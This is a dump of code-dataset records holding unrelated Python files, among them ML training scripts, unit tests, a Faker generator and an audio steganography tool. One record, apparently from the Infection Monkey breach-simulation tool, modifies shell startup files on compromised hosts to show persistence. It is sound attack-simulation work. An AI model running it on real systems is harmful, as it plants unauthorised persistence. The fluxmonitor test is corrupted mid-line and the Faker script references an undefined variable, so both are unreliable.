他の比較結果 ...\n ]\n th_sim = 0.7\n th_max = 500\n\n combined_text = combine_similar_strings(list_text, list_result, th_sim, th_max)\n\n \"\"\"\n combined_text = []\n current_text = list_text[0]\n\n for i in range(len(list_text) - 1):\n similarity, sum_len = list_result[i]\n next_text = list_text[i + 1]\n\n if similarity >= th_sim and sum_len <= th_max:\n current_text += next_text\n else:\n combined_text.append(current_text)\n current_text = next_text\n\n combined_text.append(current_text)\n return combined_text\n\n def _get_similarity(self, text1: str, text2: str) -> float:\n \"\"\"テキスト1とテキスト2の文書ベクトルのコサイン類似度を計算\"\"\"\n embeding_1 = self.model.encode(text1).reshape(1, -1)\n embeding_2 = self.model.encode(text2).reshape(1, -1)\n\n if np.any(np.isnan(embeding_1)) or np.any(np.isnan(embeding_2)):\n return 0\n\n sim = cosine_similarity(embeding_1, embeding_2)\n return sim\n\n def _semantic_segmentation(self, segments: list[str], threshold: float) -> list:\n new_segments = []\n is_over = True\n\n while is_over:\n dict_result = self._semantic_segmentation_core(segments=segments, threshold=threshold)\n list_index = dict_result[\"list_index\"]\n list_sim = dict_result[\"list_sim\"]\n for index_i in list_index:\n seg = \" \".join([segments[i] for i in index_i])\n new_segments.append(seg)\n if len(seg) > self.max_segment_text:\n if threshold > 1.0:\n is_over = False\n else:\n is_over = True\n new_segments = []\n break\n else:\n is_over = False\n threshold += 0.01\n\n return new_segments\n\n def _index_mapping(self, segment_map) -> list[int]:\n \"\"\"分割された文のインデックスをリストでまとめる\"\"\"\n index_list = []\n temp = []\n for index, i in enumerate(segment_map):\n if i == 1:\n index_list.append(temp)\n temp = [index]\n else:\n temp.append(index)\n index_list.append(temp)\n return index_list\n\n def _semantic_segmentation_core(self, segments: list[str], threshold: float) -> dict:\n segment_map = [0]\n list_sim = [0.0]\n for index, (text1, text2) in enumerate(zip(segments[:-1], segments[1:])):\n sim = self._get_similarity(text1, text2)\n list_sim.append(sim[0][0])\n if sim >= threshold:\n segment_map.append(0)\n else:\n segment_map.append(1)\n list_index = self._index_mapping(segment_map)\n return {\"list_index\": list_index, \"list_sim\": list_sim}\n","repo_name":"jumtra/agenda_maker","sub_path":"agenda_maker/model/segmentation/semantic_segmentation.py","file_name":"semantic_segmentation.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71046123689","text":"from random import randint #gera um valor aleatorio entre o numero que esta entre ()\n\nnumero_informado = -1 #ele colocou o menos -1 pq esta fora possibilidade entre 0 a 9\nnumero_secreto = randint(0, 9)\n\nwhile numero_informado != numero_secreto: #enquanto o numero informado for diferente do numero secreto, vai continuar tentando, no caso o usuario\n numero_informado = int(input('Informe o numero: '))\n\nprint('Numero secreto {} foi encontrado!'.format(numero_secreto))\n\n\n#aq é um laço indefinido, ou seja bem aleatorio, porem se tentar ficar executando o mesmo numero não vai dar\n#usado em casos especificos \n#https://www.youtube.com/watch?v=9Xzrzmq3eDg","repo_name":"kamibarreto/Cod3r","sub_path":"Estrutura_Controle/while_1.py","file_name":"while_1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328599528","text":"from tests.trainer.generic import 
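The `_index_mapping` helper near the end of the segmentation record groups consecutive token indices into segments, where a `1` in the map marks a boundary. A self-contained sketch of that grouping, with a guard added for a leading boundary (which the original would record as an empty group):

def index_mapping(segment_map: list) -> list:
    """Group indices into runs; a 1 starts a new run."""
    groups, current = [], []
    for index, flag in enumerate(segment_map):
        if flag == 1 and current:
            groups.append(current)
            current = [index]
        else:
            current.append(index)
    groups.append(current)
    return groups

assert index_mapping([0, 0, 1, 0, 1]) == [[0, 1], [2, 3], [4]]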
std_trainer_input_2\n\nfrom knodle.trainer.wscrossweigh.wscrossweigh_weights_calculator import WSCrossWeighWeightsCalculator\n\n\ndef test_dscw_base_test(std_trainer_input_2):\n (\n model,\n inputs_x, mapping_rules_labels_t, train_rule_matches_z,\n test_dataset, test_labels\n ) = std_trainer_input_2\n\n trainer = WSCrossWeighWeightsCalculator(\n model=model,\n mapping_rules_labels_t=mapping_rules_labels_t,\n model_input_x=inputs_x,\n rule_matches_z=train_rule_matches_z\n )\n\n trainer.train()\n clf_report, _ = trainer.test(test_dataset, test_labels)\n\n # Check that this runs without error\n assert True\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/wscrossweigh/test_wscw.py","file_name":"test_wscw.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"11975539687","text":"import unittest\r\nfrom swml import SignalWireML, SipRefer\r\n\r\nclass TestSipRefer(unittest.TestCase):\r\n def setUp(self):\r\n self.response = SignalWireML()\r\n\r\n def test_sip_refer_with_instance(self):\r\n main_section = self.response.add_section('main')\r\n # Create a SipRefer instance with a more complex result parameter\r\n sip_refer_instance = SipRefer(\"sip:alice@example.com\", {\"when\": \"vars.return_value != 'success'\",\r\n \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}})\r\n main_section.add_instruction(sip_refer_instance)\r\n\r\n expected_swml = '{\"sections\": {\"main\": [{\"sip_refer\": {\"to_uri\": \"sip:alice@example.com\", \"result\": {\"when\": \"vars.return_value != \\'success\\'\", \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}}}}]}}'\r\n self.assertEqual(self.response.generate_swml(), expected_swml)\r\n\r\n def test_sip_refer_with_method(self):\r\n main_section = self.response.add_section('main')\r\n # Call the sip_refer method with a more complex result parameter\r\n main_section.sip_refer(to_uri=\"sip:alice@example.com\",\r\n result={\"when\": \"vars.return_value != 'success'\",\r\n \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}})\r\n\r\n expected_swml = '{\"sections\": {\"main\": [{\"sip_refer\": {\"to_uri\": \"sip:alice@example.com\", \"result\": {\"when\": \"vars.return_value != \\'success\\'\", \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}}}}]}}'\r\n self.assertEqual(self.response.generate_swml(), expected_swml)","repo_name":"signalwire-community/swml-python","sub_path":"tests/test_swml_sip_refer.py","file_name":"test_swml_sip_refer.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26492894094","text":"import subprocess\nfrom typing import Dict\n\nfrom common.common_consts.post_breach_consts import POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION\nfrom common.common_consts.timeouts import LONG_REQUEST_TIMEOUT\nfrom infection_monkey.i_puppet.i_puppet import PostBreachData\nfrom infection_monkey.post_breach.pba import PBA\nfrom infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import (\n get_commands_to_modify_shell_startup_files,\n)\nfrom infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger\n\n\nclass ModifyShellStartupFiles(PBA):\n \"\"\"\n This PBA attempts to modify shell startup files,\n like ~/.profile, ~/.bashrc, ~/.bash_profile in linux,\n and profile.ps1 in windows.\n \"\"\"\n\n def __init__(self, telemetry_messenger: ITelemetryMessenger):\n 
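The SWML tests above compare serialized JSON strings against hand-written expectations. A reduced version of that pattern with a made-up payload; `json.dumps` with default separators produces exactly the `", "` / `": "` spacing those expected strings use.

import json
import unittest

class TestJsonOutput(unittest.TestCase):
    def test_serialization(self):
        payload = {"sections": {"main": [{"sip_refer": {"to_uri": "sip:alice@example.com"}}]}}
        expected = '{"sections": {"main": [{"sip_refer": {"to_uri": "sip:alice@example.com"}}]}}'
        self.assertEqual(json.dumps(payload), expected)

if __name__ == "__main__":
    unittest.main()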
super().__init__(telemetry_messenger, name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION)\n\n def run(self, options: Dict):\n results = [pba.run(options) for pba in self.modify_shell_startup_PBA_list()]\n if not results:\n results = [\n (\n \"Modify shell startup files PBA failed: Unable to find any regular users\",\n False,\n )\n ]\n # `command` is empty here since multiple commands were run through objects of the nested\n # class. The results of each of those were aggregated to send the telemetry just once.\n self.pba_data.append(PostBreachData(self.name, self.command, results))\n return self.pba_data\n\n @classmethod\n def modify_shell_startup_PBA_list(cls):\n return cls.ShellStartupPBAGenerator.get_modify_shell_startup_pbas()\n\n class ShellStartupPBAGenerator:\n @classmethod\n def get_modify_shell_startup_pbas(cls):\n (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux), (\n cmds_for_windows,\n shell_startup_files_per_user_for_windows,\n ) = get_commands_to_modify_shell_startup_files()\n\n pbas = []\n\n for startup_file_per_user in shell_startup_files_per_user_for_windows:\n windows_cmds = \" \".join(cmds_for_windows).format(startup_file_per_user)\n pbas.append(cls.ModifyShellStartupFile(linux_cmds=\"\", windows_cmds=windows_cmds))\n\n for username in usernames_for_linux:\n for shell_startup_file in shell_startup_files_for_linux:\n linux_cmds = (\n \" \".join(cmds_for_linux).format(shell_startup_file).format(username)\n )\n pbas.append(cls.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds=\"\"))\n\n return pbas\n\n class ModifyShellStartupFile(PBA):\n def __init__(self, linux_cmds, windows_cmds):\n super().__init__(\n telemetry_messenger=None,\n name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,\n linux_cmd=linux_cmds,\n windows_cmd=windows_cmds,\n )\n\n def run(self, options):\n if self.command:\n try:\n output = subprocess.check_output( # noqa: DUO116\n self.command,\n stderr=subprocess.STDOUT,\n shell=True,\n timeout=LONG_REQUEST_TIMEOUT,\n ).decode()\n\n return output, True\n except subprocess.CalledProcessError as err:\n # Return error output of the command\n return str(err), False\n except subprocess.TimeoutExpired as err:\n return str(err), False\n","repo_name":"acorbil2022/infectionMonkey","sub_path":"monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py","file_name":"modify_shell_startup_files.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18105065109","text":"\n# WIP\nimport csv\nimport random\nfrom faker import Faker\nimport faker.providers\nfrom faker.providers import address, automotive, bank, barcode, color, company, credit_card, currency, date_time, emoji, file, geo, internet, isbn, job, lorem, misc, person, phone_number, profile, python, sbn, ssn, user_agent\n\n\n\n# 24 standard providers\nstandard_providers = [\n address.Provider,\n automotive.Provider,\n bank.Provider,\n barcode.Provider,\n color.Provider,\n company.Provider,\n credit_card.Provider,\n currency.Provider,\n date_time.Provider,\n emoji.Provider,\n file.Provider,\n geo.Provider,\n internet.Provider,\n isbn.Provider,\n job.Provider,\n lorem.Provider,\n misc.Provider,\n person.Provider,\n phone_number.Provider,\n profile.Provider,\n python.Provider,\n sbn.Provider,\n ssn.Provider,\n user_agent.Provider ]\n \n\n\nfake = Faker()\n\n# pii_to_faker = {}\n\n# for provider in standard_providers:\n# # Instantiate the provider\n# provider_instance = 
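The nested `ModifyShellStartupFile.run` above wraps `subprocess.check_output` with a timeout and maps each failure mode to an `(output, success)` pair. The same pattern in isolation; the 60-second timeout is an arbitrary stand-in for the project's `LONG_REQUEST_TIMEOUT`.

import subprocess

def run_shell(command: str, timeout: int = 60):
    """Run a shell command; return (output, True) on success, (error, False) otherwise."""
    try:
        output = subprocess.check_output(
            command, stderr=subprocess.STDOUT, shell=True, timeout=timeout
        ).decode()
        return output, True
    except subprocess.CalledProcessError as err:
        return str(err), False  # non-zero exit status
    except subprocess.TimeoutExpired as err:
        return str(err), False  # command ran past the deadline

print(run_shell("echo hello"))  # -> ('hello\n', True)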
provider(fake)\n\n# # Loop over all methods of the provider\n# for method_name in dir(provider_instance):\n# # Ignore special methods (those that start with '__')\n# if not method_name.startswith('__'):\n# method = getattr(provider_instance, method_name)\n\n# # Check if the method is callable\n# if callable(method):\n# # Add the method to pii_to_faker\n# pii_to_faker[method_name] = method\n\npii_to_faker = {\n# \"animal_image\": fake.animal_image(),\n\"ascii_company_email\": fake.ascii_company_email(),\n\"ascii_email\": fake.ascii_email(),\n\"ascii_free_email\": fake.ascii_free_email(),\n\"ascii_safe_email\": fake.ascii_safe_email(),\n\"boolean\": fake.boolean(),\n\"building_number\": fake.building_number(),\n# \"building_string\": fake.building_string(),\n\"city\": fake.city(),\n# \"city_name\": fake.city_name(),\n\"city_prefix\": fake.city_prefix(),\n\"city_suffix\": fake.city_suffix(),\n\"color\": fake.color(),\n\"company\": fake.company(),\n\"company_email\": fake.company_email(),\n\"coordinate\": fake.coordinate(),\n\"country\": fake.country(),\n\"country_calling_code\": fake.country_calling_code(),\n\"credit_card_expire\": fake.credit_card_expire(),\n\"credit_card_full\": fake.credit_card_full(),\n\"credit_card_number\": fake.credit_card_number(),\n\"credit_card_provider\": fake.credit_card_provider(),\n\"credit_card_security_code\": fake.credit_card_security_code(),\n\"currency\": fake.currency(),\n\"currency_code\": fake.currency_code(),\n\"date\": fake.date(),\n\"date_between\": fake.date_between(),\n\"date_between_dates\": fake.date_between_dates(),\n\"date_object\": fake.date_object(),\n\"date_of_birth\": fake.date_of_birth(),\n\"day_of_month\": fake.day_of_month(),\n\"day_of_week\": fake.day_of_week(),\n\"domain_name\": fake.domain_name(),\n\"domain_word\": fake.domain_word(),\n\"dsv\": fake.dsv(),\n\"ean\": fake.ean(),\n\"email\": fake.email(),\n\"file_extension\": fake.file_extension(),\n\"file_name\": fake.file_name(),\n\"file_path\": fake.file_path(),\n\"first_name\": fake.first_name(),\n\"first_name_female\": fake.first_name_female(),\n\"first_name_male\": fake.first_name_male(),\n\"first_name_nonbinary\": fake.first_name_nonbinary(),\n\"fixed_width\": fake.fixed_width(),\n# \"format\": fake.format(),\n\"free_email\": fake.free_email(),\n\"free_email_domain\": fake.free_email_domain(),\n# \"geo_coordinate\": fake.geo_coordinate(),\n\"hex_color\": fake.hex_color(),\n\"image_url\": fake.image_url(),\n\"internet_explorer\": fake.internet_explorer(),\n\"ipv4\": fake.ipv4(),\n\"ipv4_network_class\": fake.ipv4_network_class(),\n\"ipv4_private\": fake.ipv4_private(),\n\"ipv4_public\": fake.ipv4_public(),\n\"ipv6\": fake.ipv6(),\n\"isbn10\": fake.isbn10(),\n\"isbn13\": fake.isbn13(),\n\"job\": fake.job(),\n\"language_code\": fake.language_code(),\n\"language_name\": fake.language_name(),\n\"last_name\": fake.last_name(),\n\"last_name_female\": fake.last_name_female(),\n\"last_name_male\": fake.last_name_male(),\n\"last_name_nonbinary\": fake.last_name_nonbinary(),\n\"latitude\": fake.latitude(),\n\"latlng\": fake.latlng(),\n\"license_plate\": fake.license_plate(),\n\"linux_platform_token\": fake.linux_platform_token(),\n\"linux_processor\": fake.linux_processor(),\n\"locale\": fake.locale(),\n\"longitude\": fake.longitude(),\n\"mac_address\": fake.mac_address(),\n\"mac_platform_token\": fake.mac_platform_token(),\n\"mac_processor\": fake.mac_processor(),\n\"md5\": fake.md5(),\n\"msisdn\": fake.msisdn(),\n\"name\": fake.name(),\n\"name_female\": fake.name_female(),\n\"name_male\": 
fake.name_male(),\n\"name_nonbinary\": fake.name_nonbinary(),\n\"nic_handle\": fake.nic_handle(),\n\"nic_handles\": fake.nic_handles(),\n\"null_boolean\": fake.null_boolean(),\n\"opera\": fake.opera(),\n\"paragraph\": fake.paragraph(),\n\"paragraphs\": fake.paragraphs(),\n\"password\": fake.password(),\n\"phone_number\": fake.phone_number(),\n\"postalcode\": fake.postalcode(),\n\"prefix\": fake.prefix(),\n\"prefix_female\": fake.prefix_female(),\n\"prefix_male\": fake.prefix_male(),\n\"prefix_nonbinary\": fake.prefix_nonbinary(),\n\"profile\": fake.profile(),\n\"pybool\": fake.pybool(),\n\"pydecimal\": fake.pydecimal(),\n\"pydict\": fake.pydict(),\n\"pyfloat\": fake.pyfloat(),\n\"pyint\": fake.pyint(),\n\"pyiterable\": fake.pyiterable(),\n\"pylist\": fake.pylist(),\n\"pyobject\": fake.pyobject(),\n\"pyset\": fake.pyset(),\n\"pystr\": fake.pystr(),\n\"pystr_format\": fake.pystr_format(),\n\"pystruct\": fake.pystruct(),\n\"pytuple\": fake.pytuple(),\n# \"random\": fake.random(),\n\"random_digit\": fake.random_digit(),\n\"random_digit_not_null\": fake.random_digit_not_null(),\n\"random_digit_or_empty\": fake.random_digit_or_empty(),\n\"random_element\": fake.random_element(),\n\"random_int\": fake.random_int(),\n\"random_letter\": fake.random_letter(),\n\"random_number\": fake.random_number(),\n\"random_sample\": fake.random_sample(),\n\"randomize_nb_elements\": fake.randomize_nb_elements(),\n# \"rgba_color\": fake.rgba_color(),\n\"safe_color_name\": fake.safe_color_name(),\n\"safe_domain_name\": fake.safe_domain_name(),\n\"safe_email\": fake.safe_email(),\n\"safari\": fake.safari(),\n\"sentence\": fake.sentence(),\n\"sentences\": fake.sentences(),\n\"sha1\": fake.sha1(),\n\"sha256\": fake.sha256(),\n\"slug\": fake.slug(),\n\"ssn\": fake.ssn(),\n\"street_address\": fake.street_address(),\n\"street_name\": fake.street_name(),\n\"street_suffix\": fake.street_suffix(),\n\"suffix\": fake.suffix(),\n\"suffix_female\": fake.suffix_female(),\n\"suffix_male\": fake.suffix_male(),\n\"suffix_nonbinary\": fake.suffix_nonbinary(),\n\"tar\": fake.tar(),\n\"text\": fake.text(),\n\"texts\": fake.texts(),\n\"time\": fake.time(),\n\"time_delta\": fake.time_delta(),\n\"time_object\": fake.time_object(),\n\"timezone\": fake.timezone(),\n\"tld\": fake.tld(),\n\"tsv\": fake.tsv(),\n\"unix_device\": fake.unix_device(),\n\"unix_partition\": fake.unix_partition(),\n\"uri\": fake.uri(),\n\"uri_extension\": fake.uri_extension(),\n\"uri_page\": fake.uri_page(),\n\"uri_path\": fake.uri_path(),\n\"url\": fake.url(),\n\"user_agent\": fake.user_agent(),\n\"uuid4\": fake.uuid4(),\n\"windows_platform_token\": fake.windows_platform_token(),\n\"word\": fake.word(),\n\"words\": fake.words(),\n\"zip\": fake.zip()\n}\n\n# generate a dataset of 1000 rows for \n\n\n\n# Save the synthetic dataset to a CSV file\nwith open('synthetic_dataset.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerows(dataset)\n","repo_name":"CodexifyAI/codexify","sub_path":"training/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26503516837","text":"\nimport unittest\nimport socket\nimport struct\n\nfrom fluxmonitor.player._device_fsm import PyDeviceFSM\nfrom tests.fixtures import Fixtures\n\nG1F6000X41Y29Z116T0E5 = struct.pack(\" 0:\n pass\n\n self.assertEqual(self.callback_queue[0][1], \"G28\")\n self.assertEqual(self.callback_queue[-1][1], 
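The generator script above has two gaps: every `pii_to_faker` entry stores a single pre-computed value rather than a callable (so all rows would be identical), and the final `writer.writerows(dataset)` references a `dataset` that is never built. A minimal way to close both gaps, with an illustrative column set and row count:

import csv
from faker import Faker

fake = Faker()
COLUMNS = ["name", "email", "phone_number", "address"]  # example subset of providers

# Call each provider per row so every row gets fresh values.
dataset = [COLUMNS] + [
    [getattr(fake, column)() for column in COLUMNS] for _ in range(1000)
]

with open("synthetic_dataset.csv", "w", newline="") as csvfile:
    csv.writer(csvfile).writerows(dataset)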
\"G28\")\n","repo_name":"flux3dp/delta-firmware","sub_path":"tests/player/test_fsm.py","file_name":"test_fsm.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74177632808","text":"# -*- coding: utf-8 -*-\nimport os\nimport multiprocessing\nfrom glob import glob\nimport moxing as mox # 华为自研模块moxing,本地机器无法安装,仅可在华为云ModelArts平台上使用,\n# moxing文档请查看 https://github.com/huaweicloud/ModelArts-Lab/tree/master/docs/moxing_api_doc\nimport numpy as np\nfrom keras import backend\nfrom keras.models import Model\nfrom keras.optimizers import adam\nfrom keras.layers import Flatten, Dense, Dropout\nfrom keras.callbacks import TensorBoard, Callback, EarlyStopping\nfrom keras import regularizers\n\nfrom data_gen import data_flow\nfrom models.resnet50 import ResNet50\n\nbackend.set_image_data_format('channels_last')\n\n\ndef model_fn(FLAGS, objective, optimizer, metrics):\n \"\"\"\n pre-trained resnet50 model\n \"\"\"\n base_model = ResNet50(weights=\"imagenet\",\n include_top=False,\n pooling=None,\n input_shape=(FLAGS.input_size, FLAGS.input_size, 3),\n classes=FLAGS.num_classes)\n for layer in base_model.layers:\n layer.trainable = False\n x = base_model.output\n x = Flatten()(x)\n x = Dense(256, activation='sigmoid', kernel_regularizer=regularizers.l1(0.0001))(x)\n x = Dropout(rate=0.3)(x)\n predictions = Dense(FLAGS.num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n model.compile(loss=objective, optimizer=optimizer, metrics=metrics)\n return model\n\n\nclass LossHistory(Callback):\n def __init__(self, FLAGS):\n super(LossHistory, self).__init__()\n self.FLAGS = FLAGS\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.FLAGS.snapshot_freq == 0:\n save_path = os.path.join(self.FLAGS.train_local, 'weights_%03d_%.4f.h5' % (epoch, logs.get('val_acc')))\n self.model.save_weights(save_path)\n if self.FLAGS.train_url.startswith('s3://'):\n save_url = os.path.join(self.FLAGS.train_url, 'weights_%03d_%.4f.h5' % (epoch, logs.get('val_acc')))\n mox.file.copy(save_path, save_url)\n print('save weights file', save_path)\n\n if self.FLAGS.keep_weights_file_num > -1:\n weights_files = glob(os.path.join(self.FLAGS.train_local, '*.h5'))\n if len(weights_files) >= self.FLAGS.keep_weights_file_num:\n weights_files.sort(key=lambda file_name: os.stat(file_name).st_ctime, reverse=True)\n for file_path in weights_files[self.FLAGS.keep_weights_file_num:]:\n os.remove(file_path) # only remove weights files on local path\n\n\ndef train_model(FLAGS):\n # data flow generator\n train_sequence, validation_sequence = data_flow(FLAGS.data_local, FLAGS.batch_size,\n FLAGS.num_classes, FLAGS.input_size)\n\n optimizer = adam(lr=FLAGS.learning_rate, decay=1e-6,clipnorm=0.001)\n objective = 'categorical_crossentropy'\n metrics = ['accuracy']\n model = model_fn(FLAGS, objective, optimizer, metrics)\n if FLAGS.restore_model_path != '' and mox.file.exists(FLAGS.restore_model_path):\n if FLAGS.restore_model_path.startswith('s3://'):\n restore_model_name = FLAGS.restore_model_path.rsplit('/', 1)[1]\n mox.file.copy(FLAGS.restore_model_path, '/cache/tmp/' + restore_model_name)\n model.load_weights('/cache/tmp/' + restore_model_name)\n os.remove('/cache/tmp/' + restore_model_name)\n else:\n model.load_weights(FLAGS.restore_model_path)\n print('restore parameters from %s success' % FLAGS.restore_model_path)\n\n if not os.path.exists(FLAGS.train_local):\n os.makedirs(FLAGS.train_local)\n 
tensorboard = TensorBoard(log_dir=FLAGS.train_local, batch_size=FLAGS.batch_size)\n early_stopping = EarlyStopping(monitor='val_loss', patience=4, verbose=2)\n history = LossHistory(FLAGS)\n model.fit_generator(\n train_sequence,\n steps_per_epoch=len(train_sequence),\n epochs=FLAGS.max_epochs,\n verbose=1,\n callbacks=[history, tensorboard, early_stopping],\n validation_data=validation_sequence,\n max_queue_size=10,\n workers=int(multiprocessing.cpu_count() * 0.7),\n use_multiprocessing=True,\n shuffle=True\n )\n\n print('training done!')\n\n # 将训练日志拷贝到OBS,然后可以用 ModelArts 训练作业自带的tensorboard查看训练情况\n if FLAGS.train_url.startswith('s3://'):\n files = mox.file.list_directory(FLAGS.train_local)\n for file_name in files:\n if file_name.startswith('enevts'):\n mox.file.copy(os.path.join(FLAGS.train_local, file_name), os.path.join(FLAGS.train_url, file_name))\n print('save events log file to OBS path: ', FLAGS.train_url)\n\n pb_save_dir_local = ''\n if FLAGS.deploy_script_path != '':\n from save_model import save_pb_model\n # 默认将最新的模型保存为pb模型,您可以使用python run.py --mode=save_pb ... 将指定的h5模型转为pb模型\n pb_save_dir_local = save_pb_model(FLAGS, model)\n\n if FLAGS.deploy_script_path != '' and FLAGS.test_data_url != '':\n print('test dataset predicting...')\n from inference import infer_on_dataset\n accuracy, result_file_path = infer_on_dataset(FLAGS.test_data_local, FLAGS.test_data_local, os.path.join(pb_save_dir_local, 'model'))\n if accuracy is not None:\n metric_file_name = os.path.join(FLAGS.train_url, 'metric.json')\n metric_file_content = '{\"total_metric\": {\"total_metric_values\": {\"accuracy\": %0.4f}}}' % accuracy\n with mox.file.File(metric_file_name, \"w\") as f:\n f.write(metric_file_content + '\\n')\n if FLAGS.train_url.startswith('s3://'):\n result_file_path_obs = os.path.join(FLAGS.train_url, 'model', os.path.basename(result_file_path))\n mox.file.copy(result_file_path, result_file_path_obs)\n print('accuracy result file has been copied to %s' % result_file_path_obs)\n else:\n print('accuracy is None')\n print('end')\n","repo_name":"Angus1996/HuaweiCloud_AI_Competition2019","sub_path":"keras/baseline/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13397836906","text":"'''\nhttps://www.acmicpc.net/problem/1935\n난이도 : 실버3\n'''\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ncal_str = input().rstrip()\n\nalp_num = {}\nalp = []\nnum_arr = []\nstack = []\n\nfor i in range(n):\n num_arr.append(int(input()))\n\nfor s in cal_str:\n if ord(s) in range(ord('A'), ord('Z')+1) and s not in alp:\n alp.append(s)\n\nalp_num = dict(zip(alp, num_arr))\n\nfor s in cal_str:\n if ord(s) in range(ord('A'), ord('Z')+1):\n stack.append(alp_num[s])\n else:\n cal = 0\n num2 = stack.pop()\n num1 = stack.pop()\n if s == '+':\n cal = num1 + num2\n elif s == '-':\n cal = num1 - num2\n elif s == '/':\n cal = num1/num2\n elif s == '*':\n cal = num1 * num2\n \n stack.append(cal)\n \nprint(\"{:.2f}\".format(stack[0]))","repo_name":"kss02281/Algorithm_Study","sub_path":"2023_Solved/자료구조/1935_후위표기식2.py","file_name":"1935_후위표기식2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11042475594","text":"import wave\nfrom tkinter import *\nfrom tkinter import filedialog\n\nfilepath = \"\" \n\ndef browseFiles():\n global filepath\n filepath = 
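The Baekjoon 1935 solution above evaluates a postfix expression by pushing operand values and popping two per operator. A compact, table-driven variant of the same stack walk:

import operator

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}

def eval_postfix(expr: str, values: dict) -> float:
    """Evaluate e.g. 'AB*C+' with operand letters looked up in `values`."""
    stack = []
    for ch in expr:
        if ch.isalpha():
            stack.append(values[ch])         # operand: push its number
        else:
            b, a = stack.pop(), stack.pop()  # right operand pops first
            stack.append(OPS[ch](a, b))
    return stack[0]

assert eval_postfix("AB*C+", {"A": 1, "B": 2, "C": 3}) == 5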
filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = [(\"Audio Files\",\n \".wav\")])\n # Change label contents\n filename = filepath.split(\"/\")[-1]\n label_file_explorer.configure(text=\"File Opened: \" + filename)\n return filepath\n\ndef encode(filepath, text):\n audio = wave.open(\"{}\".format(filepath) ,mode=\"rb\")\n frame_bytes = bytearray(list(audio.readframes(audio.getnframes())))\n string = text.get(\"1.0\",'end-1c')\n string = string + int((len(frame_bytes)-(len(string)*8*8))/8) *'#'\n bits = list(map(int, ''.join([bin(ord(i)).lstrip('0b').rjust(8,'0') for i in string])))\n for i, bit in enumerate(bits):\n frame_bytes[i] = (frame_bytes[i] & 254) | bit\n frame_modified = bytes(frame_bytes)\n\n filetypes = [('Audio Files', '.wav')]\n file = filedialog.asksaveasfile(initialdir = \"/\", \n title = \"Save As\", \n filetypes = filetypes, \n defaultextension = '.wav')\n newAudio = wave.open(file.name, 'wb')\n newAudio.setparams(audio.getparams())\n newAudio.writeframes(frame_modified)\n newAudio.close()\n audio.close()\n\ndef decode(frame):\n filepath = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = [(\"Audio Files\",\n \".wav\")])\n audio = wave.open(\"{}\".format(filepath), mode='rb')\n frame_bytes = bytearray(list(audio.readframes(audio.getnframes())))\n extracted = [frame_bytes[i] & 1 for i in range(len(frame_bytes))]\n string = \"\".join(chr(int(\"\".join(map(str,extracted[i:i+8])),2)) for i in range(0,len(extracted),8))\n decoded = string.split(\"###\")[0]\n\n for widget in frame.winfo_children(): # Reset frame\n widget.destroy()\n canvas = Canvas(frame, bg = \"black\")\n scrollbar = Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\n scrollable_frame = Frame(canvas)\n\n scrollable_frame.bind(\"\", lambda e: canvas.configure(scrollregion = canvas.bbox(\"all\")))\n\n canvas.create_window((0, 0), window = scrollable_frame, anchor =\"nw\", width = 570)\n canvas.configure(yscrollcommand=scrollbar.set)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n frame_message = Message(scrollable_frame, \n text = decoded,\n anchor = W,\n justify = LEFT,\n width = 550,\n bg = \"black\", \n fg = \"white\", \n font = (\"Courier New\", 11))\n frame_message.pack(fill = BOTH)\n\n audio.close()\n\ndef down(x):\n for i in range(x):\n temp = Label(window)\n temp.pack()\n \n# Create the root window\nwindow = Tk()\n \n# Set window title\nwindow.title('Dreamcatcher Audio')\n\nwidth = 600\nheight = 600\nscreen_width = window.winfo_screenwidth() # Get your screen width\nscreen_height = window.winfo_screenheight() # Get your screen height\n\nx = (screen_width / 2) - (width / 2)\ny = (screen_height /2) - (height / 2)\nwindow.geometry(f'{width}x{height}+{int(x)}+{int(y)}') # Pop up window at the center of the screen\n\nwindow.resizable(0, 0)\n \n# Create 